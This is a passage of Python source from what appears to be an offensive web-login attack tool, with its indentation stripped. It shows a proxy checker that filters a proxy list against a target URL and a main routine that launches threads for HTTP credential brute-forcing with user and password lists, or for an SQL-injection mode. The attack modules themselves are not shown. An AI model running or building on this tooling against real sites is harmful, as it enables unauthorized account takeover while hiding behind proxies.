except:
pass
try:
proxylist = fread(PROXY_PATH).split("\n")
workers = []
result = Queue()
for tryProxy in proxylist:
if len(workers) == options.threads:
do_job(workers)
del workers[:]
worker = threading.Thread(target=checProxyConn,
args=(tryProxy, options.url, result,
options.verbose))
worker.daemon = True
workers.append(worker)
do_job(workers)
del workers[:]
except KeyboardInterrupt as error:
printf("[x] Terminated by user!", "bad")
import os
os._exit(0)
except Exception as error:
die("[x] GetProxy: Error while checking proxy connection to target",
error)
finally:
try:
_data = "\n".join(list(result.queue))
printf("[*] Get %s proxies." % (len(_data)), "good")
printf("[+] Write working proxies")
fwrite(LIVE_PATH, _data)
printf("[*] Write working proxies completed", "good")
except Exception as err:
die("[x] GetProxy: Error while writing result", err)
def main(setTargetURL, setOptions, setMode, setRunOptions):
setUserlist, setNumberThreads, setKeyFalse, setPasslist = setOptions.values(
)
setProxy, setVerbose, setLog = setRunOptions.values()
try:
sizePasslist = actions.size_o(setPasslist)
sizeUserlist = actions.size_o(setUserlist)
setUserlist = setUserlist.split("\n")
setPasslist = setPasslist.split("\n")
# TODO Check condition each case
except:
#utils.printf("Can not get size of passlist", "bad")
pass
timeStarting = time.time()
workers = []
try:
#lock = threading.Lock()
#lock.acquire()
# Create thread list
#usePasslist = list(itertools.islice(setPasslist, sizePasslist))
#usePasslist = setPasslist.readlines()
#TODO modify for sql injection mode
if setMode == "--sqli":
for i in xrange(setNumberThreads):
worker = threading.Thread(
target=sqltest.handle,
args=(setTargetURL, setUserlist, setPasslist,
sizeUserlist * sizePasslist, setProxy, setKeyFalse))
# add threads to list
workers.append(worker)
else:
for i in xrange(setNumberThreads):
worker = threading.Thread(target=httpbrute.handle,
args=(setTargetURL, setUserlist,
setPasslist.split("\n"),
sizePasslist, setProxy,
setKeyFalse))
# add threads to list
workers.append(worker)
except Exception as error:
utils.die("Error while creating threads", error)
# Start all threads
try:
for worker in workers:
worker.daemon = True
worker.start()
#except (KeyboardInterrupt, SystemExit):
except KeyboardInterrupt: # as error:
# for worker in workers:
# worker.join()
utils.die("Terminated by user!", "KeyboardInterrupt")
except SystemExit: # as error
utils.die("Terminated by system!", "SystemExit")
except Exception as error:
utils.die("Error while running", error)
finally:
try:
for worker in workers:
worker.join()
except:
pass
############################################
# Get result
#
############################################
# try:
# credentials = processBruteForcing.actGetResult()
#
# # check result
# if len(credentials) == 0:
# utils.printf("Password not found!", "bad")
# else:
# utils.printf("")
# utils.print_table(("Username", "Password"), *credentials)
# except:
# #utils.printf("\nCan not get result.\n", "bad")
# pass
utils.printf("\nCompleted. Run time: %0.5s [s]\n" %
(time.time() - timeStarting))
########################################
# Clear resources
#
########################################
try:
setPasslist.close()
except:
pass
try:
setUserlist.close()
except:
pass
sys.exit(0)
